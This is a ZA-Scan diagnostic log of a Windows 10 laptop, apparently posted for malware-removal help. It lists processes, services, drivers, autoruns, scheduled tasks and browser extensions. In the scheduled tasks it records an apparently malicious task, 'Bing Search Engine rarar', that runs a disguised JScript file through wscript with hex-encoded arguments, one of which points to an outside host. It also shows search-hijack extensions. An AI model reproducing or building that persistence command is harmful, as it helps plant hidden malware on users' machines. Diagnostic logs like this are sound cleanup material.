ZA-Scan V1.0.0.5 Updated 24-October-2017 Tool run by AnaGlaucia on 23/01/2018 at 20:32:49,93. Microsoft Windows 10 Home Single Language 10.0.15063 x64 Running in: Normal Mode No Internet Access Detected Launched: C:\Users\AnaGlaucia\Downloads\ZA-Scan.exe [Z-Analyse Scan] ==== Running Processes ====================== C:\PROGRA~2\GbPlugin\GbpSv.exe C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe C:\Program Files (x86)\Lenovo\Lenovo Smart Update\Lenovo Smart Update Service.exe C:\Program Files (x86)\Unchecky\bin\unchecky_svc.exe C:\PROGRA~2\GbPlugin\GbpSv.exe C:\Program Files (x86)\Unchecky\bin\unchecky_bg.exe C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe C:\Program Files (x86)\Google\Drive\googledrivesync.exe C:\Program Files\AVAST Software\Avast\AvastUI.exe C:\Users\AnaGlaucia\AppData\Local\Microsoft\OneDrive\OneDrive.exe C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\uTorrent.exe C:\Program Files (x86)\Google\Drive\googledrivesync.exe C:\Users\AnaGlaucia\AppData\Local\MEGAsync\MEGAsync.exe C:\Program Files (x86)\Lenovo EasyCamera\Monitor.exe C:\Program Files (x86)\Lenovo\Lenovo Smart Update\Lenovo Smart Update.exe C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe C:\Program Files (x86)\Lenovo\YouCam\YouCamTray.exe C:\Program Files (x86)\iTunes\iTunesHelper.exe C:\Program Files (x86)\Dropbox\Client\Dropbox.exe C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\updates\3.5.1_44332\utorrentie.exe C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\updates\3.5.1_44332\utorrentie.exe C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe C:\Program Files\AVAST Software\Avast\AvastUI.exe C:\WINDOWS\SysWOW64\ctfmon.exe C:\Users\AnaGlaucia\Downloads\ZA-Scan.exe C:\WINDOWS\SysWOW64\cmd.exe C:\WINDOWS\SysWOW64\cmd.exe C:\WINDOWS\SysWOW64\cmd.exe C:\Users\ANAGLA~1\AppData\Local\Temp\ZAScan.exe ==== Services(whitelist) ====================== Powered by [url=http://www.antimalwarehelp.be/EDev/]E Dev[/url] R2 - [AdobeARMservice] - Adobe Acrobat Update Service - c:\program files (x86)\common files\adobe\arm\1.0\armsvc.exe R2 - [Apple Mobile Device] - Apple Mobile Device - c:\program files (x86)\common files\apple\mobile device support\applemobiledeviceservice.exe R2 - [Bonjour Service] - Serviço do Bonjour - c:\program files\bonjour\mdnsresponder.exe R2 - [DbxSvc] - DbxSvc - c:\windows\system32\dbxsvc.exe R2 - [GbpSv] - Gbp Service - c:\progra~2\gbplugin\gbpsv.exe R2 - [Intel(R) Capability Licensing Service Interface] - Intel(R) Capability Licensing Service Interface - c:\program files\intel\icls client\heciserver.exe R2 - [jhi_service] - Intel(R) Dynamic Application Loader Host Interface Service - c:\program files (x86)\intel\intel(r) management engine components\dal\jhi_service.exe R2 - [Lenovo Smart Update Service] - Lenovo Smart Update Service - c:\program files (x86)\lenovo\lenovo smart update\lenovo smart update service.exe R2 - [LMS] - Intel(R) Management and Security Application Local Management Service - c:\program files (x86)\intel\intel(r) management engine components\lms\lms.exe R2 - [SecurityHealthService] - Serviço da Central de Segurança do Windows Defender - c:\windows\system32\securityhealthservice.exe R2 - [SynTPEnhService] - SynTPEnh Caller Service - c:\program files\synaptics\syntp\syntpenhservice.exe R2 - [TrueKey] - Intel Security True Key - c:\program files\truekey\mcafee.truekey.service.exe R2 - [TrueKeyScheduler] - Intel Security True Key Scheduler - c:\program files\truekey\mctkschedulerservice.exe R2 - [Unchecky] - Unchecky - c:\program files (x86)\unchecky\bin\unchecky_svc.exe R2 - [UNS] - Intel(R) Management and Security Application User Notification Service - c:\program files (x86)\intel\intel(r) management engine components\uns\uns.exe R2 - [Warsaw Technology] - Warsaw Technology - c:\program files\diebold\warsaw\core.exe R2 - [WSearch] - Windows Search - c:\windows\system32\searchindexer.exe R3 - [aswbIDSAgent] - aswbIDSAgent - c:\program files\avast software\avast\x64\aswidsagenta.exe R3 - [ICCS] - Intel(R) Integrated Clock Controller Service - Intel(R) ICCS - c:\program files (x86)\intel\intel(r) integrated clock controller service\iccproxy.exe R3 - [iPod Service] - iPod Service - c:\program files\ipod\bin\ipodservice.exe S2 - [dbupdate] - Serviço Atualização do Dropbox (dbupdate) - c:\program files (x86)\dropbox\update\dropboxupdate.exe S2 - [gupdate] - Serviço do Google Update (gupdate) - c:\program files (x86)\google\update\googleupdate.exe S2 - [MBAMService] - MBAMService - c:\program files (x86)\malwarebytes anti-malware\mbamservice.exe S2 - [sppsvc] - Proteção de Software - c:\windows\system32\sppsvc.exe S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe S3 - [ALG] - Serviço Gateway de Camada de Aplicativo - c:\windows\system32\alg.exe S3 - [COMSysApp] - COM+ System Application - c:\windows\system32\dllhost.exe S3 - [cphs] - Intel(R) Content Protection HECI Service - c:\windows\syswow64\intelcphecisvc.exe S3 - [dbupdatem] - Serviço Atualização do Dropbox (dbupdatem) - c:\program files (x86)\dropbox\update\dropboxupdate.exe S3 - [diagnosticshub.standardcollector.service] - Serviço Coletor de Padrões de Hub de Diagnóstico da Microsoft (R) - c:\windows\system32\diagsvcs\diagnosticshub.standardcollector.service.exe S3 - [Fax] - Fax - c:\windows\system32\fxssvc.exe S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - c:\windows\microsoft.net\framework64\v3.0\wpf\presentationfontcache.exe S3 - [gupdatem] - Serviço do Google Update (gupdatem) - c:\program files (x86)\google\update\googleupdate.exe S3 - [gusvc] - Google Software Updater - c:\program files (x86)\google\common\google updater\googleupdaterservice.exe S3 - [McComponentHostService] - McAfee Security Scan Component Host Service - c:\program files\mcafee security scan\3.11.500\mcchsvc.exe S3 - [MSDTC] - Coordenador de transações distribuídas - c:\windows\system32\msdtc.exe S3 - [msiserver] - Windows Installer - c:\windows\system32\msiexec.exe S3 - [PerfHost] - Host de DLL de Contador de Desempenho - c:\windows\syswow64\perfhost.exe S3 - [RpcLocator] - Alocador Remote Procedure Call (RPC) - c:\windows\system32\locator.exe S3 - [SensorDataService] - Serviço de Dados de Sensor - c:\windows\system32\sensordataservice.exe S3 - [SNMPTRAP] - Interceptação SNMP - c:\windows\system32\snmptrap.exe S3 - [spectrum] - Serviço de Percepção do Windows - c:\windows\system32\spectrum.exe S3 - [TieringEngineService] - Gerenciamento de Camadas de Armazenamento - c:\windows\system32\tieringengineservice.exe S3 - [TrueKeyServiceHelper] - Intel Security True Key Helper Service - c:\program files\truekey\mcafee.truekey.servicehelper.exe S3 - [TrustedInstaller] - Instalador de Módulos do Windows - c:\windows\servicing\trustedinstaller.exe S3 - [vds] - Disco Virtual - c:\windows\system32\vds.exe S3 - [VSS] - Cópia de Sombra de Volume - c:\windows\system32\vssvc.exe S3 - [wbengine] - Serviço de Mecanismo de Backup em Nível de Bloco - c:\windows\system32\wbengine.exe S3 - [WdNisSvc] - Serviço de Inspeção de Rede do Windows Defender Antivirus - c:\program files\windows defender\nissrv.exe S3 - [WinDefend] - Serviço Windows Defender Antivirus - c:\program files\windows defender\msmpeng.exe S3 - [wmiApSrv] - Adaptador de Desempenho WMI - c:\windows\system32\wbem\wmiapsrv.exe S3 - [WMPNetworkSvc] - Serviço de Compartilhamento de Rede do Windows Media Player - c:\program files\windows media player\wmpnetwk.exe ==== Drivers(whitelist) ====================== Powered by [url=http://www.antimalwarehelp.be/EDev/]E Dev[/url] R0 - [aswbidsh] - aswbidsh - C:\WINDOWS\system32\Drivers\aswbidsh.sys [x] R0 - [aswblog] - aswblog - C:\WINDOWS\system32\Drivers\aswblog.sys [x] R0 - [aswbuniv] - aswbuniv - C:\WINDOWS\system32\Drivers\aswbuniv.sys [x] R0 - [FileInfo] - File Information FS MiniFilter - C:\WINDOWS\system32\Drivers\FileInfo.sys R0 - [FltMgr] - FltMgr - C:\WINDOWS\system32\Drivers\FltMgr.sys R0 - [Mup] - Mup - C:\WINDOWS\system32\Drivers\Mup.sys R0 - [Wof] - Windows Overlay File System Filter Driver - C:\WINDOWS\system32\Drivers\Wof.sys R1 - [NetBIOS] - NetBIOS Interface - C:\WINDOWS\system32\Drivers\NetBIOS.sys R2 - [srv] - Driver SMB 1.xxx do Servidor - C:\WINDOWS\system32\Drivers\srv.sys R3 - [srv2] - Driver SMB 2.xxx do Servidor - C:\WINDOWS\system32\Drivers\srv2.sys R0 - [ACPI] - Microsoft ACPI Driver - C:\WINDOWS\system32\Drivers\ACPI.sys R0 - [acpiex] - Microsoft ACPIEx Driver - C:\WINDOWS\system32\Drivers\acpiex.sys R0 - [aswRvrt] - aswRvrt - C:\WINDOWS\system32\Drivers\aswRvrt.sys R0 - [aswVmm] - aswVmm - C:\WINDOWS\system32\Drivers\aswVmm.sys R0 - [CLFS] - Common Log (CLFS) - C:\WINDOWS\system32\Drivers\CLFS.sys R0 - [CNG] - CNG - C:\WINDOWS\system32\Drivers\CNG.sys R0 - [Disk] - Driver de disco - C:\WINDOWS\system32\Drivers\Disk.sys R0 - [EhStorClass] - Enhanced Storage Filter Driver - C:\WINDOWS\system32\Drivers\EhStorClass.sys R0 - [fvevol] - Driver de Filtro de Criptografia de Unidade de Disco BitLocker - C:\WINDOWS\system32\Drivers\fvevol.sys R0 - [iaStorA] - iaStorA - C:\WINDOWS\system32\Drivers\iaStorA.sys R0 - [intelpep] - Driver Intel(R) Power Engine Plug-in - C:\WINDOWS\system32\Drivers\intelpep.sys R0 - [iorate] - Driver do Filtro de Taxa de E/S de Disco - C:\WINDOWS\system32\Drivers\iorate.sys R0 - [KSecDD] - KSecDD - C:\WINDOWS\system32\Drivers\KSecDD.sys R0 - [KSecPkg] - KSecPkg - C:\WINDOWS\system32\Drivers\KSecPkg.sys R0 - [LHDmgr] - LHDmgr - C:\WINDOWS\system32\Drivers\LHDmgr.sys [x] R0 - [mountmgr] - Gerenciador de Pontos de Montagem - C:\WINDOWS\system32\Drivers\mountmgr.sys R0 - [msisadrv] - msisadrv - C:\WINDOWS\system32\Drivers\msisadrv.sys R0 - [NDIS] - Driver do Sistema NDIS - C:\WINDOWS\system32\Drivers\NDIS.sys R0 - [partmgr] - Driver de partição - C:\WINDOWS\system32\Drivers\partmgr.sys R0 - [pci] - PCI Bus Driver - C:\WINDOWS\system32\Drivers\pci.sys R0 - [pcw] - Performance Counters for Windows Driver - C:\WINDOWS\system32\Drivers\pcw.sys R0 - [pdc] - pdc - C:\WINDOWS\system32\Drivers\pdc.sys R0 - [rdyboost] - ReadyBoost - C:\WINDOWS\system32\Drivers\rdyboost.sys R0 - [spaceport] - Driver de Espaços de Armazenamento - C:\WINDOWS\system32\Drivers\spaceport.sys R0 - [Tcpip] - Driver de Protocolo TCP/IP - C:\WINDOWS\system32\Drivers\Tcpip.sys R0 - [vdrvroot] - Enumerador de Unidade Virtual Microsoft - C:\WINDOWS\system32\Drivers\vdrvroot.sys R0 - [volmgr] - Driver de Gerenciador de Volumes - C:\WINDOWS\system32\Drivers\volmgr.sys R0 - [volmgrx] - Gerenciador de Volume Dinâmico - C:\WINDOWS\system32\Drivers\volmgrx.sys R0 - [volsnap] - Volume Shadow Copy driver - C:\WINDOWS\system32\Drivers\volsnap.sys R0 - [volume] - Driver do volume - C:\WINDOWS\system32\Drivers\volume.sys R0 - [Wdf01000] - Serviço de Estruturas de Driver em Modo Kernel - C:\WINDOWS\system32\Drivers\Wdf01000.sys R0 - [WFPLWFS] - Plataforma para Filtros do Microsoft Windows - C:\WINDOWS\system32\Drivers\WFPLWFS.sys R0 - [WindowsTrustedRT] - Windows Trusted Execution Environment Class Extension - C:\WINDOWS\system32\Drivers\WindowsTrustedRT.sys R0 - [WindowsTrustedRTProxy] - Serviço de Proteção de Tempo de Execução Confiável do Microsoft Windows - C:\WINDOWS\system32\Drivers\WindowsTrustedRTProxy.sys R1 - [AFD] - Ancillary Function Driver for Winsock - C:\WINDOWS\system32\Drivers\AFD.sys R1 - [Beep] - Beep - C:\WINDOWS\system32\Drivers\Beep.sys R1 - [tdx] - Driver de Suporte a TDI Herdado de NetIO - C:\WINDOWS\system32\Drivers\tdx.sys R2 - [tcpipreg] - TCP/IP Registry Compatibility - C:\WINDOWS\system32\Drivers\tcpipreg.sys S0 - [hwpolicy] - Hardware Policy Driver - C:\WINDOWS\system32\Drivers\hwpolicy.sys S3 - [atapi] - Canal de IDE - C:\WINDOWS\system32\Drivers\atapi.sys S3 - [Tcpip6] - @todo.dll,-100;Microsoft IPv6 Protocol Driver - C:\WINDOWS\system32\Drivers\Tcpip6.sys [x] ==== Startup Registry Enabled ====================== [HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run] "OneDriveSetup"="C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup" [HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run] "OneDriveSetup"="C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup" [HKEY_USERS\S-1-5-21-3965318276-2551654934-727219755-1001\Software\Microsoft\Windows\CurrentVersion\Run] "EPSON Stylus CX4200 Series"="C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIAEA.EXE /FU C:\WINDOWS\TEMP\E_S295F.tmp /EF HKCU" "GoogleDriveSync"="C:\Program Files (x86)\Google\Drive\googledrivesync.exe /autostart" "OneDrive"="C:\Users\AnaGlaucia\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background" "uTorrent"="C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Lenovo EasyCamera_Monitor"="C:\Program Files (x86)\Lenovo EasyCamera\monitor.exe" "Smart Update"="C:\Program Files (x86)\Lenovo\Lenovo Smart Update\Lenovo Smart Update.exe -s" "YouCam Mirage"="C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe" "YouCam Tray"="C:\Program Files (x86)\Lenovo\YouCam\YouCamTray.exe /s" "iTunesHelper"="C:\Program Files (x86)\iTunes\iTunesHelper.exe" "Dropbox"="C:\Program Files (x86)\Dropbox\Client\Dropbox.exe /systemstartup" "SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "EPSON Stylus CX4200 Series"="C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIAEA.EXE /FU C:\WINDOWS\TEMP\E_S295F.tmp /EF HKCU" "GoogleDriveSync"="C:\Program Files (x86)\Google\Drive\googledrivesync.exe /autostart" "OneDrive"="C:\Users\AnaGlaucia\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background" "uTorrent"="C:\Users\AnaGlaucia\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED" ==== Startup Registry Enabled x64 ====================== [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "IgfxTray"="C:\WINDOWS\system32\igfxtray.exe" "HotKeysCmds"="C:\WINDOWS\system32\hkcmd.exe" "Persistence"="C:\WINDOWS\system32\igfxpers.exe" "RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s" "Energy Management"="C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe" "EnergyUtility"="C:\Program Files (x86)\Lenovo\Energy Management\Utility.exe" "AvastUI.exe"="C:\Program Files\AVAST Software\Avast\AvLaunch.exe /gui" "SecurityHealth"="%ProgramFiles%\Windows Defender\MSASCuiL.exe" "SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe " ==== Startup Folders ====================== 2015-01-30 22:49:10 1670 --sha-w- C:\Users\AnaGlaucia\AppData\Roaming\Microsoft\LastFlashConfig.wfc ==== Task Scheduler Jobs ====================== C:\WINDOWS\tasks\Adobe Flash Player PPAPI Notifier.job --a-------- C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_162_pepper.exe [17/09/2016 14:20] C:\WINDOWS\tasks\Adobe Flash Player Updater.job --a-------- C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [17/09/2016 14:20] C:\WINDOWS\tasks\DropboxUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [04/11/2016 21:17] C:\WINDOWS\tasks\DropboxUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [04/11/2016 21:17] C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001Core.job --a-------- C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe [] C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001UA.job --a-------- C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe [] C:\WINDOWS\tasks\Synaptics TouchPad Enhancements.job --a-------- C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [03/06/2015 04:16] ==== Other Scheduled Tasks ====================== "C:\WINDOWS\SysNative\tasks\Adobe Acrobat Update Task" [C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe] "C:\WINDOWS\SysNative\tasks\Adobe Flash Player PPAPI Notifier" [C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_162_pepper.exe] "C:\WINDOWS\SysNative\tasks\Adobe Flash Player Updater" [C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe] "C:\WINDOWS\SysNative\tasks\Avast Emergency Update" [C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe] "C:\WINDOWS\SysNative\tasks\Bing Search Engine rarar" [C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{C6D303B0-4C91-8976-CA57-173450159CFA}\dafi.txt" "687474703a2f2f77617662736c792e636f6d" "433a5c50726f6772616d446174615c7b43364433303342302d344339312d383937362d434135372d3137333435303135394346417d5c6c656c616c69" "433a5c50726f6772616d446174615c7b43364433303342302d344339312d383937362d434135372d3137333435303135394346417d5c6c697369636f73" "//B" "//E:jscript" "--IsErIk"] "C:\WINDOWS\SysNative\tasks\CreateExplorerShellUnelevatedTask" [C:\WINDOWS\explorer.exe] "C:\WINDOWS\SysNative\tasks\Dolby Selector" [C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe] "C:\WINDOWS\SysNative\tasks\DropboxUpdateTaskMachineCore" [C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe] "C:\WINDOWS\SysNative\tasks\DropboxUpdateTaskMachineUA" [C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe] "C:\WINDOWS\SysNative\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001Core" [C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe] "C:\WINDOWS\SysNative\tasks\FacebookUpdateTaskUserS-1-5-21-3965318276-2551654934-727219755-1001UA" [C:\Users\AnaGlaucia\AppData\Local\Facebook\Update\FacebookUpdate.exe] "C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe] "C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe] "C:\WINDOWS\SysNative\tasks\MirageAgent" [C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe] "C:\WINDOWS\SysNative\tasks\OneDrive Standalone Update Task-S-1-5-21-3965318276-2551654934-727219755-1001" [%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe] "C:\WINDOWS\SysNative\tasks\RtHDVBg_Dolby" ["C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe"] "C:\WINDOWS\SysNative\tasks\RTKCPL" ["C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe"] "C:\WINDOWS\SysNative\tasks\SafeZone scheduled Autoupdate 1468516578" [C:\Program Files\AVAST Software\SZBrowser\launcher.exe] "C:\WINDOWS\SysNative\tasks\Synaptics TouchPad Enhancements" [C:\Program Files\Synaptics\SynTP\SynTPEnh.exe] "C:\WINDOWS\SysNative\tasks\User_Feed_Synchronization-{C1D8E56A-EDF5-45CB-B216-E6A462B549CB}" [C:\WINDOWS\system32\msfeedssync.exe] "C:\WINDOWS\SysNative\tasks\Apple\AppleSoftwareUpdate" [C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe] "C:\WINDOWS\SysNative\tasks\AVAST Software\Avast settings backup" [C:\Program Files\Common Files\AV\avast Antivirus\backup.exe] "C:\WINDOWS\SysNative\tasks\AVAST Software\Overseer" [C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe] "C:\WINDOWS\SysNative\tasks\MEGA\MEGAsync Update Task S-1-5-21-3965318276-2551654934-727219755-1001" [C:\Users\AnaGlaucia\AppData\Local\MEGAsync\MEGAupdater.exe] ==== Chromium Look ====================== Google Chrome Version: 46.0.2490.86 HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions eofcbnmajmjmplflapaojjnihcjkigck - No path found[] gomekmidlodglbbmalcneegieacbdmki - No path found[] olojcnagmcbplpdddabmpfehhlleobpb - No path found[] HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\Extensions lmjegmlicamnimmfhcmpkclmigmmcbeh - No path found[] olojcnagmcbplpdddabmpfehhlleobpb - No path found[] Slides - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek Docs - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake Google Drive - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf YouTube - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo Sheets - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap EasyPDFCombine - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\fncbkmmlcehhipmmofdhejcggdapcmon Google Docs Offline - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi Search Extension by Ask - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgfehfbnofiffladdncogfobimealokp Google Drive App Launcher - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh Chrome Web Store Payments - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda Search Manager - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\olojcnagmcbplpdddabmpfehhlleobpb Gmail - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia Chrome Media Router - AnaGlaucia\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm ==== IE Start and Search Settings ====================== [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Start Page"="https://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-c64a8af2" "Search Page"="http://www.google.com" "Default_Search_URL"="http://www.google.com" "Default_Page_URL"="http://www.google.com" "Search Bar"="https://www.google.com/?trackid=sp-006" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] "Start Page"="https://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-c64a8af2" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main] "Start Page"="https://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-c64a8af2" [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes] "DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}" ==== All HKLM and HKCU SearchScopes ====================== HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - https://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-c64a8af2&q={searchTerms} HKLM\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - https://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-c64a8af2&q={searchTerms} HKLM\Wow6432Node\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC HKCU\SearchScopes "DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}" HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - https://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-c64a8af2&q={searchTerms} HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE02 HKCU\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} - http://www.google.com/search?q={searchTerms} ==== HijackThis Entries ====================== R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.google.com/?trackid=sp-006 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 F2 - REG:system.ini: UserInit= O2 - BHO: True Key Helper - {0F4B8786-5502-4803-8EBC-F652A1153BB6} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll O2 - BHO: G-Buster Browser Defense Itaú Unibanco - {C41A1C0E-EA6C-11D4-B1B8-444553540008} - C:\PROGRAM FILES (X86)\GBPLUGIN\gbiehuni.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll O3 - Toolbar: True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab ==== EOF on 23/01/2018 at 21:02:03,07 ======================